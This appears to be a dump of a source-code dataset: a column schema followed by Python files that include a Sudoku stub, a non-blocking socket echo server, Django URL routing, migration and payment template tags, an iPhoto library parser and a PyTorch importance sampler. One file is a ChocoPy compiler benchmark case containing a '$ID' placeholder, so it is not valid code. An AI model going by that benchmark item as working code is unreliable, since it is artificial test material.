blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
sequencelengths
1
1
author_id
stringlengths
1
132
dcaa5f0a9632efd7fbc43f1cdf8d739b0161c222
1d2bbeda56f8fede69cd9ebde6f5f2b8a50d4a41
/hard/python3/c0006_37_sudoku-solver/00_leetcode_0006.py
b12724d00299702d5e3f0bb08ed2233d0c6d66e9
[]
no_license
drunkwater/leetcode
38b8e477eade68250d0bc8b2317542aa62431e03
8cc4a07763e71efbaedb523015f0c1eff2927f60
refs/heads/master
2020-04-06T07:09:43.798498
2018-06-20T02:06:40
2018-06-20T02:06:40
127,843,545
0
2
null
null
null
null
UTF-8
Python
false
false
1,049
py
# DRUNKWATER TEMPLATE(add description and prototypes) # Question Title and Description on leetcode.com # Function Declaration and Function Prototypes on leetcode.com #37. Sudoku Solver #Write a program to solve a Sudoku puzzle by filling the empty cells. #A sudoku solution must satisfy all of the following rules: #Each of the digits 1-9 must occur exactly once in each row. #Each of the digits 1-9 must occur exactly once in each column. #Each of the the digits 1-9 must occur exactly once in each of the 9 3x3 sub-boxes of the grid. #Empty cells are indicated by the character '.'. #A sudoku puzzle... #...and its solution numbers marked in red. #Note: #The given board contain only digits 1-9 and the character '.'. #You may assume that the given Sudoku puzzle will have a single unique solution. #The given board size is always 9x9. #class Solution: # def solveSudoku(self, board): # """ # :type board: List[List[str]] # :rtype: void Do not return anything, modify board in-place instead. # """ # Time Is Money
16a31b69d896402cb06e319c17af7fcaddfc80e1
fd56bcee0326b529eaf66462827ec0bf790c3335
/days33/非阻塞模型/服务端.py
4c09ecd799b80ff203bd598805aa7ed69eadab80
[]
no_license
95Li/oldboy-learning-code
d1ff638e7d9db27b03afde1ff99844f3de2d9f46
dbf97bd5bfb906bce4e92cc378aef277e6ebd443
refs/heads/master
2020-03-21T15:59:31.604549
2018-06-27T14:32:12
2018-06-27T14:32:12
138,744,611
0
0
null
null
null
null
UTF-8
Python
false
false
1,104
py
from socket import * import time s=socket() s.bind(('172.0.0.1',8080)) s.listen(5) s.setblocking(False) r_list=[] w_list=[] while True: try: conn,addr=s.accept() r_list.append(conn) except BlockingIOError: print('ganhuo') print('rlist',len(r_list)) del_rlist=[] for conn in r_list: try: date=conn.recv(1024) w_list.append((conn,date.upper())) except BlockingIOError : continue except ConnectionResetError: del_rlist.append(conn) del_wlist=[] for item in w_list: try : conn=item[0] date=item[1] conn.send(date) del_wlist.append(item) except BlockingIOError : continue except ConnectionResetError: del_wlist.append(item) for conn in del_rlist: r_list.remove(conn) for item in del_wlist: w_list.remove(item)
f99afe6266414414ff87f689507fa29216429229
8ca6f67883355bd9678a3b8a26ec7fe7b464f5c1
/project/deluxenation/urls.py
a6b9c3c3b09a2dcc9fba1dedda77b6389c95600e
[]
no_license
mmahnken/deluxenation
868f971f1d2d73052e5f8a3444a7751141710c02
35f94a053db378dc4835868766e69c836f58eb1c
refs/heads/master
2020-09-21T20:52:56.268009
2017-02-06T05:21:42
2017-02-06T05:21:42
66,738,373
1
0
null
null
null
null
UTF-8
Python
false
false
1,345
py
"""project URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.10/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url, include from django.contrib import admin from django.contrib.admin.views.decorators import staff_member_required from django.conf.urls.static import static import drawings.urls import drawings.views import settings urlpatterns = [ url(r'^admin/nb/$', staff_member_required(drawings.views.NotebookCreateView.as_view(template_name='drawings/notebook_create.html'))), url(r'^admin/bulk-add/drawings/$', staff_member_required(drawings.views.BulkDrawingCreateView.as_view(template_name='drawings/bulk-add.html'))), url(r'^admin/', admin.site.urls), url(r'^', include(drawings.urls)), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
f78c278d29399237b8c709646ac66aac72e5c105
ba54b70f93fe7f9d114623d76b1ad3f88309d66f
/paysto/templatetags/paysto_tags.py
9b92d8d51facb7986b806436b724bb611b2dd303
[]
no_license
loobinsk/newprj
9769b2f26092ce7dd8612fce37adebb307b01b8b
c6aa6a46973fb46375f4b05a86fe76207a8ae16d
refs/heads/master
2023-05-07T00:28:44.242163
2021-05-25T08:22:05
2021-05-25T08:22:05
370,617,690
0
0
null
null
null
null
UTF-8
Python
false
false
1,329
py
#-*- coding: utf-8 -*- from django import template from paysto import PAYSTO_ONLINE_MERCHANT_NOCART_URL from paysto.forms import PaymentForm from django.conf import settings from paysto.models import BasePayment from django.utils.safestring import mark_safe register = template.Library() @register.inclusion_tag('paysto/payment-form.html', takes_context=True) def payment_form(context, payment): form = PaymentForm(data={ 'PAYSTO_SHOP_ID': settings.PAYSTO_SHOP_ID, 'PAYSTO_SUM': payment.total, 'PAYSTO_INVOICE_ID': payment.id, 'PAYSTO_DESC': payment.description, 'PayerEmail': payment.user.email }) return { 'form': form, 'action': PAYSTO_ONLINE_MERCHANT_NOCART_URL } @register.filter def payment_status(status): if status == BasePayment.STATUS_CONFIRMED: return mark_safe('<span class="text-success">%s</span>' % BasePayment.STATUSES[status]) if status == BasePayment.STATUS_WAITING: return mark_safe('<span class="text-muted">%s</span>' % BasePayment.STATUSES[status]) if status == BasePayment.STATUS_ERROR: return mark_safe('<span class="text-danger">%s</span>' % BasePayment.STATUSES[status]) else: try: return mark_safe(BasePayment.STATUSES[status]) except: return ""
a3a575bf96ed9e2f22999b912246dbf230f5d0c3
9b6db11ea5bf899625857078988e1d66fbd14212
/iphoto2html/iphotodata.py
232745a728d98e2f80b12129c43a3169feb85404
[ "Apache-2.0" ]
permissive
mblondel/iphoto2html
d5757c8350470f36128b6633433b0667997c509f
95c48847972d5d1c595f44fac6edbfaa72c9ac88
refs/heads/master
2020-05-31T17:27:31.323177
2014-05-11T05:42:27
2014-05-11T05:42:27
19,658,739
1
0
null
null
null
null
UTF-8
Python
false
false
23,489
py
'''iPhoto database: reads iPhoto database and parses it into albums and images. @author: [email protected] This class reads iPhoto image, event, album information from the file AlbumData.xml in the iPhoto library directory. That file is written by iPhoto for the media browser in other applications. All data are organized in the class IPhotoData. Images in iPhoto are grouped using events (formerly knows as rolls) and albums. Each image is in exactly one event, and optionally, in zero or more albums. Albums can be nested (folders). The album types are: Flagged - flagged pictures Folder - contains other albums Published - an album published to MobileMe Regular - a regular user created album SelectedEventAlbum - most recent album (as shown in iPhoto) Shelf - list of flagged images Smart - a user created smart album SpecialMonth - "Last Month" SpecialRoll - "Last Import" Event - this type does not exist in the XML file, but we use it in this code to allow us to treat events just like any other album Face - Face album (does not exist in iPhoto, only in this code). None - should not really happen ''' # Copyright 2010 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import os import sys import applexml import imageutils import systemutils as sysutils def parse_face_rectangle(string_data): """Parse a rectangle specification into an array of coordinate data. Args: string_data: Rectangle like '{{x, y}, {width, height}}' Returns: Array of x, y, width and height as floats. """ try: return [float(entry.strip('{} ')) for entry in string_data.split(',')] except ValueError: print >> sys.stderr, 'Failed to parse rectangle ' + string_data return [ 0.4, 0.4, 0.2, 0.2 ] def _get_aperture_master_path(preview_path): """Given a path to a Aperture preview image, return the folder where the Master would be stored if it is in the library.""" # Folder where preview image is stored. folder = os.path.dirname(preview_path) # Cut of the last folder in the path (see iphotodata_test.py for # example). folder = os.path.dirname(folder) return folder.replace('/Previews/', '/Masters/', 1) class IPhotoData(object): """top level iPhoto data node.""" def __init__(self, xml_data, is_aperture): """# call with results of readAppleXML.""" self.data = xml_data self.aperture = is_aperture self.albums = {} self.face_albums = None # Master map of keywords self.keywords = self.data.get("List of Keywords") self.face_names = {} # Master map of faces face_list = self.data.get("List of Faces") if face_list: for face_entry in face_list.values(): face_key = face_entry.get("key") face_name = face_entry.get("name") self.face_names[face_key] = face_name # Other keys in face_entry: image, key image face index, # PhotoCount, Order self.images_by_id = {} image_data = self.data.get("Master Image List") if image_data: for key in image_data: image = IPhotoImage(image_data.get(key), self.keywords, self.face_names) self.images_by_id[key] = image album_data = self.data.get("List of Albums") self.root_album = IPhotoContainer("", "Root", None, None) for data in album_data: album = IPhotoAlbum(data, self.images_by_id, self.albums, self.root_album) self.albums[album.albumid] = album roll_data = self.data.get("List of Rolls") self._rolls = {} if roll_data: for roll in roll_data: roll = IPhotoRoll(roll, self.images_by_id) self._rolls[roll.albumid] = roll self.root_album.addalbum(roll) self.images_by_base_name = None self.images_by_file_name = None def _build_image_name_list(self): self.images_by_base_name = {} self.images_by_file_name = {} # build the basename map for image in self.images_by_id.values(): base_name = image.getbasename() other_images = self.images_by_base_name.get(base_name) if other_images is None: other_images = [] self.images_by_base_name[base_name] = other_images other_images.append(image) imagename = image.getimagename() other_image_list = self.images_by_file_name.get(imagename) if other_image_list is None: other_image_list = [] self.images_by_file_name[imagename] = other_image_list other_image_list.append(image) def _getapplicationversion(self): return self.data.get("Application Version") applicationVersion = property(_getapplicationversion, doc='iPhoto version') def _getimages(self): return self.images_by_id.values() images = property(_getimages, "List of images") def _getrolls(self): return self._rolls.values() rolls = property(_getrolls, "List of rolls (events)") def getroll(self, album_id): return self._rolls.get(album_id) def getbaseimages(self, base_name): """returns an IPhotoImage list of all images with a matching base name. """ if not self.images_by_base_name: self._build_image_name_list() return self.images_by_base_name.get(base_name) def getnamedimage(self, file_name): """returns an IPhotoImage for the given file name.""" if not self.images_by_file_name: self._build_image_name_list() image_list = self.images_by_file_name.get(file_name) if image_list: return image_list[0] return None def getallimages(self): """returns map from full path name to image.""" image_map = {} for image in self.images_by_id.values(): image_map[image.getimagepath()] = image image_map[image.thumbpath] = image if image.originalpath is not None: image_map[image.originalpath] = image return image_map def checkalbumsizes(self, max_size): """Prints a message for any event or album that has too many images.""" messages = [] for album in self._rolls.values(): if album.size > max_size: messages.append("%s: event too large (%d)" % (album.name, album.size)) for album in self.albums.values(): if album.albumtype == "Regular" and album.size > max_size: messages.append("%s: album too large (%d)" % (album.name, album.size)) messages.sort() for message in messages: print message def load_aperture_originals(self): """Attempts to locate the original image files (Masters). Only works if the masters are stored in the library.""" if not self.aperture: return for image in self.images_by_id.values(): image.find_aperture_original() # public void checkComments() { # TreeSet<String> images = new TreeSet<String>(); # for (IPhotoImage image : images_by_id.values()) { # String comment = image.GetComment(); # if ((comment == null or comment.length() == 0) && !image.IsHidden()) # images.add(image.caption); # } # for (String caption : images) # System.out.println(caption + ": missing comment."); # } def check_inalbums(self): """Checks that all images are in albums according to their events.""" messages = [] for image in self.images_by_id.values(): if image.IsHidden(): continue roll_name = self._rolls[image.roll].name albums = [] in_album = False for album in image.GetAlbums(): album_name = album.name if album.GetAlbumType == "Regular": albums.append(album.name) in_album = True if album_name != roll_name: messages.append(image.caption + ": in wrong album (" + roll_name + " vs. " + album_name + ").") elif (album.isSmart() and album_name.endswith(" Collection") or album_name == "People" or album_name == "Unorganized"): in_album = True if not in_album: messages.append(image.caption + ": not in any album.") if albums: messages.append(image.caption + ": in more than one album: " + " ".join(albums)) messages.sort() for message in messages: print message def getfacealbums(self): """Returns a map of albums for faces.""" if self.face_albums: return self.face_albums.values() # Build the albums on first call self.face_albums = {} for image in self.images: for face in image.getfaces(): face_album = self.face_albums.get(face) if not face_album: face_album = IPhotoFace(face) self.face_albums[face] = face_album face_album.addimage(image) return self.face_albums.values() class IPhotoImage(object): """Describes an image in the iPhoto database.""" def __init__(self, data, keyword_map, face_map): self.data = data self._caption = sysutils.nn_string(data.get("Caption")).strip() self.comment = sysutils.nn_string(data.get("Comment")).strip() if data.has_key("DateAsTimerInterval"): self.date = applexml.getappletime(data.get("DateAsTimerInterval")) else: self.date = None self.mod_date = applexml.getappletime( data.get("ModDateAsTimerInterval")) self.image_path = data.get("ImagePath") if data.has_key("Rating"): self.rating = int(data.get("Rating")) else: self.rating = None if data.get("longitude"): latitude = float(data.get("latitude")) longitude = float(data.get("longitude")) self.gps = imageutils.GpsLocation(latitude, longitude) else: self.gps = None self.keywords = [] keyword_list = data.get("Keywords") if keyword_list is not None: for i in keyword_list: self.keywords.append(keyword_map.get(i)) self.originalpath = data.get("OriginalPath") self.roll = data.get("Roll") self.albums = [] # list of albums that this image belongs to self.faces = [] self.face_rectangles = [] self.event_name = '' # name of event (roll) that this image belongs to self.event_index = '' # index within event self.event_index0 = '' # index with event, left padded with 0 face_list = data.get("Faces") if face_list: for face_entry in face_list: face_key = face_entry.get("face key") face_name = face_map.get(face_key) if face_name: self.faces.append(face_name) # Rectangle is '{{x, y}, {width, height}}' as ratios, # referencing the lower left corner of the face rectangle. self.face_rectangles.append(parse_face_rectangle( face_entry.get("rectangle"))) # Other keys in face_entry: face index def getimagepath(self): """Returns the full path to this image..""" return self.image_path def getimagename(self): """Returns the file name of this image..""" name = os.path.split(self.image_path)[1] return name def getbasename(self): """Returns the base name of the main image file.""" return sysutils.getfilebasename(self.image_path) def _getcaption(self): if not self._caption: return self.getimagename() return self._caption caption = property(_getcaption, doc="Caption (title) of the image") def ismovie(self): """Tests if this image is a movie.""" return self.data.get("MediaType") == "Movie" def addalbum(self, album): """Adds an album to the list of albums for this image.""" self.albums.append(album) def addface(self, name): """Adds a face (name) to the list of faces for this image.""" self.faces.append(name) def getfaces(self): """Gets the list of face tags for this image.""" return self.faces def ishidden(self): """Tests if the image is hidden (using keyword "Hidden")""" return "Hidden" in self.keywords def _getthumbpath(self): return self.data.get("ThumbPath") thumbpath = property(_getthumbpath, doc="Path to thumbnail image") def _getrotationisonlyedit(self): return self.data.get("RotationIsOnlyEdit") rotation_is_only_edit = property(_getrotationisonlyedit, doc="Rotation is only edit.") def _search_for_file(self, folder_path, basename): """Scans recursively through a folder tree and returns the path to the first file it finds that starts with "basename". """ for file_name in os.listdir(folder_path): path = os.path.join(folder_path, file_name) if os.path.isdir(path): path = self._search_for_file(path, basename) if path: return path elif file_name.startswith(basename): return path return None def find_aperture_original(self): """Attempts to locate the Aperture Master image. Works only for .jpg masters that are stored in the Aperture library. Saves the result as originalpath.""" master_path = _get_aperture_master_path(self.image_path) if not os.path.exists(master_path): return basename = sysutils.getfilebasename(self.image_path) file_name = os.path.join(master_path, basename + '.jpg') if os.path.exists(file_name): self.originalpath = file_name return path = self._search_for_file(master_path, basename + '.') if path: self.originalpath = path return print "No master for " + self.image_path class IPhotoContainer(object): """Base class for IPhotoAlbum and IPhotoRoll.""" def __init__(self, name, albumtype, data, images): self.name = name self.date = None # The iPhoto master album has no album type. if not albumtype and name == 'Photos': albumtype = 'Master' # Convert Aperture numeric album types to iPhoto album type names. if albumtype == '1': albumtype = 'Regular' elif albumtype == '2': albumtype = 'Smart' elif albumtype == '3': albumtype = 'Special' elif albumtype == '4': albumtype = 'Event' elif albumtype == '5': albumtype = 'Library' elif albumtype == '6': albumtype = 'Folder' elif albumtype == '18': albumtype = 'OnlineAccount' elif albumtype == '20': albumtype = 'Published' elif not albumtype: print 'No album type for %s.' % name elif albumtype.isdigit(): albumid = int(albumtype) if albumid > 90: # 94 - Photos # 95 - Flagged # 96 - Library Album # 97 - Projects # 98 - Aperture # 99 - Aperture Library albumtype = name else: print 'Unknown album type %s for %s.' % (albumtype, name) self.albumtype = albumtype self.data = data self.albumid = -1 self.images = [] self.albums = [] self.master = False if not self.isfolder() and data and data.has_key("KeyList"): keylist = data.get("KeyList") for key in keylist: image = images.get(key) if image: self.images.append(image) else: print "%s: image with id %s does not exist." % (name, key) def _getcomment(self): return self.data.get("Comments") comment = property(_getcomment, doc='comments (description)') def _getsize(self): return len(self.images) size = property(_getsize, "Gets the size (# of images) of this album.") def isfolder(self): """tests if this album is a folder.""" return "Folder" == self.albumtype def getfolderhint(self): """Gets a suggested folder name from comments.""" if self.comment: for comment in self.comment.split("\n"): if comment.startswith("@"): return comment[1:] return None def getcommentwithouthints(self): """Gets the image comments, with any folder hint lines removed""" result = [] if self.comment: for line in self.comment.split("\n"): if not line.startswith("@"): result.append(line) return "\n".join(result) def addalbum(self, album): """adds an album to this container.""" self.albums.append(album) def find_oldest_date(self): # For containers that don't have a date, we calculate it from the image # dates. if self.date: return self.date = datetime.datetime.now() for image in self.images: if image.date and image.date < self.date: self.date = image.date def tostring(self): """Gets a string that describes this album or event.""" return "%s (%s)" % (self.name, self.albumtype) def ishidden(self): return all([img.ishidden() for img in self.images]) class IPhotoRoll(IPhotoContainer): """Describes an iPhoto Roll or Event.""" def __init__(self, data, images): IPhotoContainer.__init__(self, data.get("RollName") if data.has_key("RollName") else data.get("AlbumName"), "Event", data, images) self.albumid = data.get("RollID") if not self.albumid: self.albumid = data.get("AlbumId") self.date = applexml.getappletime(self.data.get( "RollDateAsTimerInterval")) if not self.date: self.date = applexml.getappletime(self.data.get( 'ProjectEarliestDateAsTimerInterval')) i = 1 index_digits = len(str(len(self.images))) for image in self.images: image.event_name = self.name image.event_index = i image.event_index0 = str(i).zfill(index_digits) i += 1 class IPhotoAlbum(IPhotoContainer): """Describes an iPhoto Album.""" def __init__(self, data, images, album_map, root_album): IPhotoContainer.__init__(self, data.get("AlbumName"), data.get("Album Type"), data, images) self.albumid = data.get("AlbumId") if data.has_key("Master"): self.master = True parent_id = data.get("Parent") if parent_id is None: self.parent = root_album else: self.parent = album_map.get(parent_id) if not self.parent: print "Album %s: parent with id %d not found." % ( self.name, parent_id) if self.parent: self.parent.addalbum(self) self.find_oldest_date() class IPhotoFace(object): """An IPhotoContainer compatible class for a face.""" def __init__(self, face): self.name = face self.albumtype = "Face" self.albumid = -1 self.images = [] self.albums = [] self.comment = "" self.date = datetime.datetime.now() def _getsize(self): return len(self.images) size = property(_getsize, "Gets the size (# of images) of this album.") def isfolder(self): """tests if this album is a folder.""" return False def getfolderhint(self): """Gets a suggested folder name from comments.""" return None def getcommentwithouthints(self): """Gets the image comments, with any folder hint lines removed""" return "" def addimage(self, image): """Adds an image to this container.""" self.images.append(image) # Set the face date based on the earlierst image. if image.date and image.date < self.date: self.date = image.date def tostring(self): """Gets a string that describes this album or event.""" return "%s (%s)" % (self.name, self.albumtype) def get_album_xmlfile(library_dir): """Locates the iPhoto AlbumData.xml or Aperture ApertureData.xml file.""" if os.path.exists(library_dir) and os.path.isdir(library_dir): album_xml_file = os.path.join(library_dir, "AlbumData.xml") if os.path.exists(album_xml_file): return album_xml_file album_xml_file = os.path.join(library_dir, "ApertureData.xml") if os.path.exists(album_xml_file): return album_xml_file raise ValueError, ("%s does not appear to be a valid iPhoto or Aperture " "library location.") % (library_dir) def get_iphoto_data(album_xml_file): """reads the iPhoto database and converts it into an iPhotoData object.""" library_dir = os.path.dirname(album_xml_file) print "Reading iPhoto database from " + library_dir + "..." album_xml = applexml.read_applexml(album_xml_file) data = IPhotoData(album_xml, album_xml_file.endswith('ApertureData.xml')) if data.aperture: if not data.applicationVersion.startswith('3.'): raise ValueError, "Aperture version %s not supported" % ( data.applicationVersion) else: if (not data.applicationVersion.startswith("9.") and not data.applicationVersion.startswith("8.") and not data.applicationVersion.startswith("7.") and not data.applicationVersion.startswith("6.")): raise ValueError, "iPhoto version %s not supported" % ( data.applicationVersion) return data
450d68a0e2c390a31c2a557f70788062ceb572ce
048d13616971fdaf17947bf1f3b1840a30a5f6c8
/apps/team/migrations/0002_auto_20150904_1835.py
0b28c5bb3ba3fe9fb3786db434dec753d3076860
[]
no_license
ImgBotApp/manutd.org.np
449955a89959d0781f181e71ec8be5c1c8ae3c42
18a53f7f4c4d4e0b47a22e5b5cb99069fd257d00
refs/heads/master
2021-06-24T06:58:53.269028
2017-09-09T15:22:25
2017-09-09T15:22:25
103,154,757
2
0
null
2017-09-12T04:46:16
2017-09-11T15:40:14
JavaScript
UTF-8
Python
false
false
1,586
py
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.conf import settings class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('team', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='player', name='address', ), migrations.RemoveField( model_name='player', name='date_of_birth', ), migrations.RemoveField( model_name='player', name='name', ), migrations.RemoveField( model_name='player', name='phone', ), migrations.RemoveField( model_name='staff', name='address', ), migrations.RemoveField( model_name='staff', name='date_of_birth', ), migrations.RemoveField( model_name='staff', name='name', ), migrations.RemoveField( model_name='staff', name='phone', ), migrations.AddField( model_name='player', name='user', field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL), preserve_default=False, ), migrations.AddField( model_name='staff', name='user', field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL), preserve_default=False, ), ]
b63539f52ac4f3863fe9cef412753b80adfc6b28
f9a8aecd848bcc79052ca068cc73850a63e6dfcf
/data/datasets/resampling/adaptive/importance_sampler.py
4112726c0616b4e253a6b9843e212d7b614c2d40
[ "MIT" ]
permissive
khoehlein/fV-SRN-Ensemble-Compression
537981a1cd31565bb504b00ca730e8bf87e7e0ef
2780b83d2594c1b38b57ab58087b46bee4b61e8b
refs/heads/master
2023-04-17T09:42:48.037397
2022-09-07T08:55:01
2022-09-07T08:55:01
532,983,107
4
1
null
2022-09-06T14:39:26
2022-09-05T16:43:24
Python
UTF-8
Python
false
false
7,115
py
import argparse from typing import Optional import torch from matplotlib import pyplot as plt from common.mathparser import BigInteger from inference import IFieldEvaluator from data.datasets.resampling.coordinate_box import CoordinateBox, UnitCube from data.datasets.resampling.adaptive.density_tree_sampler import FastDensityTreeSampler from data.datasets.resampling.adaptive.density_tree import FastDensityTree from data.datasets.resampling.adaptive.statistical_tests import ( FastKolmogorovSmirnovTestNd, FastWhiteHomoscedasticityTest, ) from data.datasets.resampling import IImportanceSampler from data.datasets.sampling import ISampler, RandomUniformSampler class DensityTreeImportanceSampler(IImportanceSampler): @staticmethod def init_parser(parser: argparse.ArgumentParser): group = parser.add_argument_group('DensityTreeImportanceSampler') prefix = '--importance-sampler:tree:' group.add_argument(prefix + 'min-depth', type=int, default=4, help=""" minimum tree depth for adaptive loss grid """) group.add_argument(prefix + 'max-depth', type=int, default=12, help=""" maximum tree depth for adaptive loss grid """) group.add_argument(prefix + 'num-samples-per-node', type=int, default=128, help=""" number of samples per node for loss tree refinement """) group.add_argument(prefix + 'alpha', type=float, default=0.05, help=""" significance threshold for splitting decision """) group.add_argument(prefix + 'batch-size', type=BigInteger, default=None, help=""" batch size for loss evaluation during importance sampling (Default: Dataset batch size) """) group.add_argument(prefix + 'min-density', type=float, default=0.01, help=""" minimum probability density for sampling per grid box """) group.add_argument(prefix + 'max-ratio', type=float, default=10, help=""" maximum ratio of probability densities during node splitting """) # group.add_argument(prefix + 'seed', type=int, default=42, help=""" # seed for importance sampling random number generator # """) @staticmethod def read_args(args: dict): prefix = 'importance_sampler:tree:' return { key: args[prefix + key] for key in ['min_depth', 'max_depth', 'num_samples_per_node', 'batch_size', 'min_density', 'max_ratio', 'alpha'] } @classmethod def from_dict(cls, args, dimension=None, device=None): sampler_kws = DensityTreeImportanceSampler.read_args(args) return DensityTreeImportanceSampler(**sampler_kws, dimension=dimension, device=device) def __init__( self, sampler: Optional[ISampler] = None, dimension:Optional[int] = None, batch_size=None, min_depth=4, max_depth=8, num_samples_per_node=128, min_density=0.01, max_ratio=10, alpha=0.05, root_box: Optional[CoordinateBox] = None, device=None, dtype=None, seed=None ): if dimension is None and sampler is not None: dimension = sampler.dimension if dimension is None and root_box is not None: dimension = root_box.dimension assert dimension is not None if sampler is not None: assert dimension == sampler.dimension if device is not None: assert device == sampler.device if dtype is not None: assert dtype == sampler.dtype device = sampler.device dtype = sampler.dtype else: assert device is not None sampler = RandomUniformSampler(dimension, device=device, dtype=dtype) if root_box is not None: assert dimension == root_box.dimension assert device == root_box.device else: root_box = UnitCube(dimension, device=device, dtype=dtype) super(DensityTreeImportanceSampler, self).__init__(dimension, root_box, device) self.dimension = dimension self.sampler = sampler self.root_box = root_box self.min_depth = min_depth self.max_depth = max_depth self.num_samples_per_node = num_samples_per_node self.min_density = min_density self.max_ratio = max_ratio self.alpha = alpha assert batch_size is not None self.batch_size = int(batch_size) self.dtype = dtype self.device = device def generate_samples(self, num_samples: int, evaluator: IFieldEvaluator, **kwargs): with torch.no_grad(): difference_test = FastKolmogorovSmirnovTestNd(alpha=self.alpha) homoscedasticity_test = FastWhiteHomoscedasticityTest(alpha=self.alpha) tree = FastDensityTree.from_scalar_field( self.root_box, self.sampler, evaluator, difference_test, homoscedasticity_test=homoscedasticity_test, min_depth=self.min_depth,max_depth=self.max_depth, num_samples_per_node=self.num_samples_per_node, store_sample_summary=True, num_samples_per_batch=self.batch_size, device=self.device ) tree.add_summaries() sampler = FastDensityTreeSampler( self.sampler, tree, min_density=self.min_density, max_ratio=self.max_ratio ) samples, weights = sampler.generate_samples(num_samples) if samples.device != self.device: samples = samples.to(self.device) weights = weights.to(self.device) perm = torch.randperm(num_samples, device=torch.device('cpu')) samples = samples[perm] weights = weights[perm] return samples, weights def _test_sampler(): import torch from torch import Tensor class Evaluator(IFieldEvaluator): def __init__(self, dimension, device=None): super(Evaluator, self).__init__(dimension, 1, device) self.direction = 4 * torch.tensor([1] * dimension, device=device)[None, :]# torch.randn(1, dimension, device=device) self.offset = torch.tensor([0.5] * dimension, device=device)[None, :] # torch.randn(1, dimension, device=device) def forward(self, positions: Tensor) -> Tensor: return torch.sum(self.direction * (positions - self.offset), dim=-1) ** 2 device = torch.device('cuda:0') evaluator = Evaluator(3, device=device) sampler = DensityTreeImportanceSampler( dimension=3, device=device, batch_size=64**3, max_ratio=3, min_density=0.1 ) for i in range(20): samples = sampler.generate_samples(4000, evaluator) c = evaluator.evaluate(samples) samples = samples.data.cpu().numpy() c = c[:, 0].data.cpu().numpy() fig = plt.figure() ax = fig.add_subplot(projection='3d') ax.scatter(samples[:, 0], samples[:, 1], samples[:, 2], c=c) plt.show() plt.close() if __name__ == '__main__': _test_sampler()
642167e640746fc13d9a13edf17d6d566e7db7ae
bd4270073cbdbafb8471bbdfe9a7fcfc75836384
/gen_yield_for.py
29f87e20a29a3bba8bb32624604fd0c06547e069
[]
no_license
Hemanthtm2/learning.python
03c5fccb0ca205dba3edd418cbf2fecad34aa532
c93d30fcb4982f27153a3f649d2bdc4d50c56b1b
refs/heads/master
2020-04-08T14:19:35.508613
2018-10-10T17:17:40
2018-10-10T17:17:40
159,431,984
0
0
null
null
null
null
UTF-8
Python
false
false
144
py
#!/usr/bin/python def print_squares(start,end): for x in range(start,end): yield x**2 for n in print_squares(2,5): print(n)
1c7f5661d1a446f130607f085ddd3c15eec9fba3
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
/cases/pa3/sample/str_cat-151.py
a0cd8b6099dc04249949a943feb61cd8816d1ab4
[]
no_license
Virtlink/ccbench-chocopy
c3f7f6af6349aff6503196f727ef89f210a1eac8
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
refs/heads/main
2023-04-07T15:07:12.464038
2022-02-03T15:42:39
2022-02-03T15:42:39
451,969,776
0
0
null
null
null
null
UTF-8
Python
false
false
279
py
a:str = "Hello" b:str = "World" c:str = "ChocoPy" def cat2(a:str, b:str) -> str: return a + b def cat3(a:str, b:str, c:str) -> str: return a + b + c print(cat2(a, b)) print(cat2("", c)) print(cat3(a, " ", c)) $ID(len(a)) print(len(cat2(a,a))) print(len(cat2("","")))
34db2935861aff91fac8d19719716dccc6985fe1
71c7683331a9037fda7254b3a7b1ffddd6a4c4c8
/PhysFit/P2VV/scripts/makeTaggingPlots.py
9203415e21f19de2f7d583b37d49ab21e2526125
[]
no_license
pseyfert-cern-gitlab-backup/Urania
edc58ba4271089e55900f8bb4a5909e9e9c12d35
1b1c353ed5f1b45b3605990f60f49881b9785efd
refs/heads/master
2021-05-18T13:33:22.732970
2017-12-15T14:42:04
2017-12-15T14:42:04
251,259,622
0
1
null
null
null
null
UTF-8
Python
false
false
8,276
py
